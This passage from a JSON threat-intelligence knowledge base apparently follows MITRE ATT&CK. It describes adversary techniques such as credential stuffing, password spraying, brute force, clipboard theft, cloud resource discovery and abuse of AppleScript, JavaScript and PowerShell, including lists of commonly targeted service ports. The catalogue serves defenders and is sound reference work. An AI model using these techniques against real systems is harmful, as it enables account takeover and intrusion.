[Sharepoint](https://app.tidalcyber.com/technique/8ac6952d-5add-4cbc-ad39-44943ed3459b) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.<sup>[[cobaltstrike manual](https://app.tidalcyber.com/references/43277d05-0aa4-4cee-ac41-6f03a49851a9)]</sup>",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "b57c5554-5a46-42cd-be7e-4206f79ef424",
"value": "Browser Session Hijacking"
},
{
"description": "Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts.\n\nCredential stuffing is a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies.\n\nTypically, management services over commonly used ports are used when stuffing credentials. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.<sup>[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1110.004"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "6d300882-d404-4f77-a19d-4a2f2b786702",
"value": "Credential Stuffing"
},
{
"description": "Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) can be used to obtain password hashes, this may only get an adversary so far when [Pass the Hash](https://app.tidalcyber.com/technique/33486e3e-1104-42d0-8053-34c8c9c4d10f) is not an option. Further, adversaries may leverage [Data from Configuration Repository](https://app.tidalcyber.com/technique/97ef6135-47d4-4b91-8783-c0b5f331340e) in order to obtain hashed credentials for network devices.<sup>[[US-CERT-TA18-106A](https://app.tidalcyber.com/references/1fe55557-94af-4697-a675-884701f70f2a)]</sup> \n\nTechniques to systematically guess the passwords used to compute hashes are available, or the adversary may use a pre-computed rainbow table to crack hashes. Cracking hashes is usually done on adversary-controlled systems outside of the target network.<sup>[[Wikipedia Password cracking](https://app.tidalcyber.com/references/d5ebb79f-b39a-46cb-b546-2db383783a58)]</sup> The resulting plaintext password resulting from a successfully cracked hash may be used to log into systems, resources, and services in which the account has access.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1110.002"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "7e8c3c70-2e9f-4fa0-b083-ff5610447dc1",
"value": "Password Cracking"
},
{
"description": "Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts.\n\nGuessing passwords can be a risky option because it could cause numerous authentication failures and account lockouts, depending on the organization's login failure policies. <sup>[[Cylance Cleaver](https://app.tidalcyber.com/references/f0b45225-3ec3-406f-bd74-87f24003761b)]</sup>\n\nTypically, management services over commonly used ports are used when guessing passwords. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n* SNMP (161/UDP and 162/TCP/UDP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.<sup>[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]</sup>. Further, adversaries may abuse network device interfaces (such as `wlanAPI`) to brute force accessible wifi-router(s) via wireless authentication protocols.<sup>[[Trend Micro Emotet 2020](https://app.tidalcyber.com/references/150327e6-db4b-4588-8cf2-ee131569150b)]</sup>\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1110.001"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "e849ebcc-e0af-45a5-aefa-c394bb759b4e",
"value": "Password Guessing"
},
{
"description": "Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. <sup>[[BlackHillsInfosec Password Spraying](https://app.tidalcyber.com/references/f45c7a4b-dafc-4e5c-ad3f-db4b0388a1d7)]</sup>\n\nTypically, management services over commonly used ports are used when password spraying. Commonly targeted services include the following:\n\n* SSH (22/TCP)\n* Telnet (23/TCP)\n* FTP (21/TCP)\n* NetBIOS / SMB / Samba (139/TCP & 445/TCP)\n* LDAP (389/TCP)\n* Kerberos (88/TCP)\n* RDP / Terminal Services (3389/TCP)\n* HTTP/HTTP Management Services (80/TCP & 443/TCP)\n* MSSQL (1433/TCP)\n* Oracle (1521/TCP)\n* MySQL (3306/TCP)\n* VNC (5900/TCP)\n\nIn addition to management services, adversaries may \"target single sign-on (SSO) and cloud-based applications utilizing federated authentication protocols,\" as well as externally facing email applications, such as Office 365.<sup>[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)]</sup>\n\nIn default environments, LDAP and Kerberos connection attempts are less likely to trigger events over SMB, which creates Windows \"logon failure\" event ID 4625.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1110.003"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
}
],
"uuid": "e63414a7-c6f7-4bcf-a6eb-25b0c4ddbb2a",
"value": "Password Spraying"
},
{
"description": "Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.\n\nBrute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), [Account Discovery](https://app.tidalcyber.com/technique/6736995e-b9ea-401b-81fa-6caeb7a17ce3), or [Password Policy Discovery](https://app.tidalcyber.com/technique/2bf2e498-99c8-4e36-ad4b-e675d95ac925). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://app.tidalcyber.com/technique/c1f7e330-f1c4-4923-b8ad-bbd79cc63cb4) as part of Initial Access.",
"meta": {
"platforms": [
"Azure AD",
"Containers",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Network",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "0c3132d5-c0df-4793-b5f2-1a95bd64ab53",
"type": "uses"
},
{
"dest-uuid": "6d300882-d404-4f77-a19d-4a2f2b786702",
"type": "similar"
},
{
"dest-uuid": "7e8c3c70-2e9f-4fa0-b083-ff5610447dc1",
"type": "similar"
},
{
"dest-uuid": "e849ebcc-e0af-45a5-aefa-c394bb759b4e",
"type": "similar"
},
{
"dest-uuid": "e63414a7-c6f7-4bcf-a6eb-25b0c4ddbb2a",
"type": "similar"
}
],
"uuid": "c16eef78-232e-47a2-98e9-046ec075b13c",
"value": "Brute Force"
},
{
"description": "Adversaries may build a container image directly on a host to bypass defenses that monitor for the retrieval of malicious images from a public registry. A remote <code>build</code> request may be sent to the Docker API that includes a Dockerfile that pulls a vanilla base image, such as alpine, from a public or local registry and then builds a custom image upon it.<sup>[[Docker Build Image](https://app.tidalcyber.com/references/ee708b64-57f3-4b47-af05-1e26b698c21f)]</sup>\n\nAn adversary may take advantage of that <code>build</code> API to build a custom image on the host that includes malware downloaded from their C2 server, and then they may utilize [Deploy Container](https://app.tidalcyber.com/technique/2618638c-f6bd-4840-a297-c45076e094a9) using that custom image.<sup>[[Aqua Build Images on Hosts](https://app.tidalcyber.com/references/efd64f41-13cc-4b2b-864c-4d2352cdadcd)]</sup><sup>[[Aqua Security Cloud Native Threat Report June 2021](https://app.tidalcyber.com/references/be9652d5-7531-4143-9c44-aefd019b7a32)]</sup> If the base image is pulled from a public registry, defenses will likely not detect the image as malicious since its a vanilla image. If the base image already resides in a local registry, the pull may be considered even less suspicious since the image is already in the environment. ",
"meta": {
"platforms": [
"Containers"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "49749e13-48ed-49fc-82d1-13ae13b457c1",
"value": "Build Image on Host"
},
{
"description": "Adversaries may collect data stored in the clipboard from users copying information within or between applications. \n\nFor example, on Windows adversaries can access clipboard data by using <code>clip.exe</code> or <code>Get-Clipboard</code>.<sup>[[MSDN Clipboard](https://app.tidalcyber.com/references/2c1b2d58-a5dc-4aee-8bdb-129a81c10408)]</sup><sup>[[clip_win_server](https://app.tidalcyber.com/references/8a961fa1-def0-5efe-8599-62e884d4ea22)]</sup><sup>[[CISA_AA21_200B](https://app.tidalcyber.com/references/633c6045-8990-58ae-85f0-00139aa9a091)]</sup> Additionally, adversaries may monitor then replace users clipboard with their data (e.g., [Transmitted Data Manipulation](https://app.tidalcyber.com/technique/70365fab-8531-4a0e-b147-7cabdfdef243)).<sup>[[mining_ruby_reversinglabs](https://app.tidalcyber.com/references/ca2074d8-330b-544e-806f-ddee7b702631)]</sup>\n\nmacOS and Linux also have commands, such as <code>pbpaste</code>, to grab clipboard contents.<sup>[[Operating with EmPyre](https://app.tidalcyber.com/references/459a4ad5-0e28-4bfc-a73e-b9dd516d516f)]</sup>",
"meta": {
"platforms": [
"Linux",
"macOS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a",
"type": "uses"
}
],
"uuid": "e8f90b73-2e59-4643-a274-78b85b8d9f88",
"value": "Clipboard Data"
},
{
"description": "Adversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.<sup>[[AWS Systems Manager Run Command](https://app.tidalcyber.com/references/ef66f17b-6a5b-5eb8-83de-943e2bddd114)]</sup><sup>[[Microsoft Run Command](https://app.tidalcyber.com/references/4f2e6adb-6e3d-5f1f-b873-4b99797f2bfa)]</sup><sup>[[SpecterOps Lateral Movement from Azure to On-Prem AD 2020](https://app.tidalcyber.com/references/eb97d3d6-21cb-5f27-9a78-1e8576acecdc)]</sup>\n\nIf an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environments virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://app.tidalcyber.com/technique/7549c2f9-b5d2-4773-90ed-42f668aecacf) to execute commands in connected virtual machines.<sup>[[MSTIC Nobelium Oct 2021](https://app.tidalcyber.com/references/7b6cc308-9871-47e5-9039-a9a7e66ce373)]</sup>",
"meta": {
"platforms": [
"Azure AD",
"IaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "944a7b91-c58e-567d-9e2c-515b93713c50",
"value": "Cloud Administration Command"
},
{
"description": "An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\n\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a <code>DescribeInstances</code> API within the Amazon EC2 API that can return information about one or more instances within an account, the <code>ListBuckets</code> API that returns a list of all buckets owned by the authenticated sender of the request, the <code>HeadBucket</code> API to determine a buckets existence along with access permissions of the request sender, or the <code>GetPublicAccessBlock</code> API to retrieve access block configuration for a bucket.<sup>[[Amazon Describe Instance](https://app.tidalcyber.com/references/c0b6a8a4-0d94-414d-b5ab-cf5485240dee)]</sup><sup>[[Amazon Describe Instances API](https://app.tidalcyber.com/references/95629746-43d2-4f41-87da-4bd44a43ef4a)]</sup><sup>[[AWS Get Public Access Block](https://app.tidalcyber.com/references/f2887980-569a-4bc2-949e-bd8ff266c43c)]</sup><sup>[[AWS Head Bucket](https://app.tidalcyber.com/references/1388a78e-9f86-4927-a619-e0fcbac5b7a1)]</sup> Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> command to list all Google Compute Engine instances in a project <sup>[[Google Compute Instances](https://app.tidalcyber.com/references/ae09e791-a00c-487b-b0e5-7768df0679a3)]</sup>, and Azure's CLI command <code>az vm list</code> lists details of virtual machines.<sup>[[Microsoft AZ CLI](https://app.tidalcyber.com/references/cfd94553-272b-466b-becb-3859942bcaa5)]</sup> In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://app.tidalcyber.com/technique/a0e40412-cbfb-477b-87fc-40f2c84d26be).<sup>[[Malwarebytes OSINT Leaky Buckets - Hioureas](https://app.tidalcyber.com/references/67ebcf71-828e-4202-b842-f071140883f8)]</sup>\n\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.<sup>[[Expel IO Evil in AWS](https://app.tidalcyber.com/references/4c2424d6-670b-4db0-a752-868b4c954e29)]</sup> The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as <code>DescribeDBInstances</code> to determine size, owner, permissions, and network ACLs of database resources. <sup>[[AWS Describe DB Instances](https://app.tidalcyber.com/references/85bda17d-7b7c-4d0e-a0d2-2adb5f0a6b82)]</sup> Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://app.tidalcyber.com/technique/5d0a3722-52b6-4968-a367-7ca6bc9a33fc), this technique focuses on the discovery of components of the provided services rather than the services themselves.",
"meta": {
"platforms": [
"IaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "fd346e4e-b22f-4cae-bc24-946d7b14b5e1",
"value": "Cloud Infrastructure Discovery"
},
{
"description": "An adversary may use a cloud service dashboard GUI with stolen credentials to gain useful information from an operational cloud environment, such as specific services, resources, and features. For example, the GCP Command Center can be used to view all assets, findings of potential security risks, and to run additional queries, such as finding public IP addresses and open ports.<sup>[[Google Command Center Dashboard](https://app.tidalcyber.com/references/a470fe2a-40ce-4060-8dfc-2cdb56bbc18b)]</sup>\n\nDepending on the configuration of the environment, an adversary may be able to enumerate more information via the graphical dashboard than an API. This allows the adversary to gain information without making any API requests.",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Office 365"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "315ce434-ad6d-4dae-a1dd-6db944a44422",
"value": "Cloud Service Dashboard"
},
{
"description": "An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.\n\nAdversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.<sup>[[Azure - Resource Manager API](https://app.tidalcyber.com/references/223cc020-e88a-4236-9c34-64fe606a1729)]</sup><sup>[[Azure AD Graph API](https://app.tidalcyber.com/references/fed0fef5-e366-4e24-9554-0599744cd1c6)]</sup>\n\nFor example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.<sup>[[Azure - Stormspotter](https://app.tidalcyber.com/references/42383ed1-9705-4313-8068-28a22a23f50e)]</sup><sup>[[GitHub Pacu](https://app.tidalcyber.com/references/bda43b1b-ea8d-4371-9984-6d8a7cc24965)]</sup>\n\nAdversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6) or [Disable or Modify Cloud Logs](https://app.tidalcyber.com/technique/6824cdb3-a4c5-45a8-a3d5-5a5afd347214).",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Office 365",
"SaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "5d0a3722-52b6-4968-a367-7ca6bc9a33fc",
"value": "Cloud Service Discovery"
},
{
"description": "Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://app.tidalcyber.com/technique/fd346e4e-b22f-4cae-bc24-946d7b14b5e1)) adversaries may access the contents/objects stored in cloud infrastructure.\n\nCloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS <sup>[[ListObjectsV2](https://app.tidalcyber.com/references/727c2077-f922-4314-908a-356c42564181)]</sup> and List Blobs in Azure<sup>[[List Blobs](https://app.tidalcyber.com/references/f9aa697a-83dd-4bae-bc11-006be51ce477)]</sup> .",
"meta": {
"platforms": [
"IaaS"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "92761d92-a288-4407-a112-bb2720f07d07",
"value": "Cloud Storage Object Discovery"
},
{
"description": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.<sup>[[Apple AppleScript](https://app.tidalcyber.com/references/b23abcb8-3004-4a42-8ada-58cdbd65e171)]</sup> These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.\n\nScripts can be run from the command-line via <code>osascript /path/to/script</code> or <code>osascript -e \"script here\"</code>. Aside from the command line, scripts can be executed in numerous ways including Mail rules, Calendar.app alarms, and Automator workflows. AppleScripts can also be executed as plain text shell scripts by adding <code>#!/usr/bin/osascript</code> to the start of the script file.<sup>[[SentinelOne AppleScript](https://app.tidalcyber.com/references/bb6aafcb-ed30-404a-a9d9-b90503a0ec7c)]</sup>\n\nAppleScripts do not need to call <code>osascript</code> to execute. However, they may be executed from within mach-O binaries by using the macOS [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560)s <code>NSAppleScript</code> or <code>OSAScript</code>, both of which execute code independent of the <code>/usr/bin/osascript</code> command line utility.\n\nAdversaries may abuse AppleScript to execute various behaviors, such as interacting with an open SSH connection, moving to remote machines, and even presenting users with fake dialog boxes. These events cannot start applications remotely (they can start them locally), but they can interact with applications if they're already running remotely. On macOS 10.10 Yosemite and higher, AppleScript has the ability to execute [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560)s, which otherwise would require compilation and execution in a mach-O binary file format.<sup>[[SentinelOne macOS Red Team](https://app.tidalcyber.com/references/4b05bd7c-22a3-4168-850c-8168700b17ba)]</sup> Since this is a scripting language, it can be used to launch more common techniques as well such as a reverse shell via [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65).<sup>[[Macro Malware Targets Macs](https://app.tidalcyber.com/references/d63f3f6a-4486-48a4-b2f8-c2a8d571731a)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1059.002"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "9f06ef9b-d587-41d3-8fc8-7d539dac5701",
"value": "AppleScript"
},
{
"description": "Adversaries may abuse cloud APIs to execute malicious commands. APIs available in cloud environments provide various functionalities and are a feature-rich method for programmatic access to nearly all aspects of a tenant. These APIs may be utilized through various methods such as command line interpreters (CLIs), in-browser Cloud Shells, [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) modules like Azure for PowerShell<sup>[[Microsoft - Azure PowerShell](https://app.tidalcyber.com/references/3b17b649-9efa-525f-aa49-cf6c9ad559d7)]</sup>, or software developer kits (SDKs) available for languages such as [Python](https://app.tidalcyber.com/technique/68fed1c9-e060-4c4d-83d9-d8c817893d65). \n\nCloud API functionality may allow for administrative access across all major services in a tenant such as compute, storage, identity and access management (IAM), networking, and security policies.\n\nWith proper permissions (often via use of credentials such as [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc) and [Web Session Cookie](https://app.tidalcyber.com/technique/d36a5323-e249-44e8-9c8b-5cc9c023a5e1)), adversaries may abuse cloud APIs to invoke various functions that execute malicious actions. For example, CLI and PowerShell functionality may be accessed through binaries installed on cloud-hosted or on-premises hosts or accessed through a browser-based cloud shell offered by many cloud platforms (such as AWS, Azure, and GCP). These cloud shells are often a packaged unified environment to use CLI and/or scripting modules hosted as a container in the cloud environment. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1059.009"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "af798e80-2cc5-5452-83e4-9560f08bf2d5",
"value": "Cloud API"
},
{
"description": "Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.<sup>[[NodeJS](https://app.tidalcyber.com/references/af710d49-48f4-47f6-98c6-8d4a4568b020)]</sup>\n\nJScript is the Microsoft implementation of the same scripting standard. JScript is interpreted via the Windows Script engine and thus integrated with many components of Windows such as the [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) and Internet Explorer HTML Application (HTA) pages.<sup>[[JScrip May 2018](https://app.tidalcyber.com/references/99e48516-f918-477c-b85e-4ad894cc031f)]</sup><sup>[[Microsoft JScript 2007](https://app.tidalcyber.com/references/e3c97d0f-150e-4fe3-a4ce-fc146a2fa718)]</sup><sup>[[Microsoft Windows Scripts](https://app.tidalcyber.com/references/9e7cd4da-da18-4d20-809a-19abb4352807)]</sup>\n\nJavaScript for Automation (JXA) is a macOS scripting language based on JavaScript, included as part of Apples Open Scripting Architecture (OSA), that was introduced in OSX 10.10. Apples OSA provides scripting capabilities to control applications, interface with the operating system, and bridge access into the rest of Apples internal APIs. As of OSX 10.10, OSA only supports two languages, JXA and [AppleScript](https://app.tidalcyber.com/technique/9f06ef9b-d587-41d3-8fc8-7d539dac5701). Scripts can be executed via the command line utility <code>osascript</code>, they can be compiled into applications or script files via <code>osacompile</code>, and they can be compiled and executed in memory of other programs by leveraging the OSAKit Framework.<sup>[[Apple About Mac Scripting 2016](https://app.tidalcyber.com/references/d2f32ac1-9b5b-408d-a7ab-d92dd9efe0ed)]</sup><sup>[[SpecterOps JXA 2020](https://app.tidalcyber.com/references/d9b6bb05-6ab4-4f5e-9ef0-f3e0cc97ce29)]</sup><sup>[[SentinelOne macOS Red Team](https://app.tidalcyber.com/references/4b05bd7c-22a3-4168-850c-8168700b17ba)]</sup><sup>[[Red Canary Silver Sparrow Feb2021](https://app.tidalcyber.com/references/f08a856d-6c3e-49e2-b7ba-399831c637e5)]</sup><sup>[[MDSec macOS JXA and VSCode](https://app.tidalcyber.com/references/979cac34-d447-4e42-b17e-8ab2630bcfec)]</sup>\n\nAdversaries may abuse various implementations of JavaScript to execute various behaviors. Common uses include hosting malicious scripts on websites as part of a [Drive-by Compromise](https://app.tidalcyber.com/technique/d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381) or downloading and executing these script files as secondary payloads. Since these payloads are text-based, it is also very common for adversaries to obfuscate their content as part of [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1059.007"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "8a669da8-8894-4fb0-9124-c3c8418985cc",
"value": "JavaScript"
},
{
"description": "Adversaries may abuse scripting or built-in command line interpreters (CLI) on network devices to execute malicious command and payloads. The CLI is the primary means through which users and administrators interact with the device in order to view system information, modify device operations, or perform diagnostic and administrative functions. CLIs typically contain various permission levels required for different commands. \n\nScripting interpreters automate tasks and extend functionality beyond the command set included in the network OS. The CLI and scripting interpreter are accessible through a direct console connection, or through remote means, such as telnet or [SSH](https://app.tidalcyber.com/technique/7620ba3a-7877-4f87-90e3-588163ac0474).\n\nAdversaries can use the network CLI to change how network devices behave and operate. The CLI may be used to manipulate traffic flows to intercept or manipulate data, modify startup configuration parameters to load malicious system software, or to disable security features or logging to avoid detection.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1059.008"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "284bfbb3-99f0-4c3d-bc1f-ab74065b7907",
"value": "Network Device CLI"
},
{
"description": "Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.<sup>[[TechNet PowerShell](https://app.tidalcyber.com/references/20ec94d1-4a5c-43f5-bb65-f3ea965d2b6e)]</sup> Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the <code>Start-Process</code> cmdlet which can be used to run an executable and the <code>Invoke-Command</code> cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).\n\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.\n\nA number of PowerShell-based offensive testing tools are available, including [Empire](https://app.tidalcyber.com/software/fea655ac-558f-4dd0-867f-9a5553626207), [PowerSploit](https://app.tidalcyber.com/software/82fad10d-c921-4a87-a533-49def83d002b), [PoshC2](https://app.tidalcyber.com/software/a3a03835-79bf-4558-8e80-7983aeb842fb), and PSAttack.<sup>[[Github PSAttack](https://app.tidalcyber.com/references/929e37ed-c230-4517-a2ef-b7896bd3e4a2)]</sup>\n\nPowerShell commands/scripts can also be executed without directly invoking the <code>powershell.exe</code> binary through interfaces to PowerShell's underlying <code>System.Management.Automation</code> assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).<sup>[[Sixdub PowerPick Jan 2016](https://app.tidalcyber.com/references/52190592-5809-4e7b-a19c-fc87b245025c)]</sup><sup>[[SilentBreak Offensive PS Dec 2015](https://app.tidalcyber.com/references/8eec1af3-c65e-4522-8087-73122ac6c281)]</sup><sup>[[Microsoft PSfromCsharp APR 2014](https://app.tidalcyber.com/references/83e346d5-1894-4c46-98eb-88a61ce7f003)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1059.001"
},
"related": [
{
"dest-uuid": "dad2337d-6d35-410a-acc5-da36ff83ee44",
"type": "uses"
}
],
"uuid": "6ca7838a-e8ad-43e8-9da6-15b640d1cbde",
"value": "PowerShell"
},
{
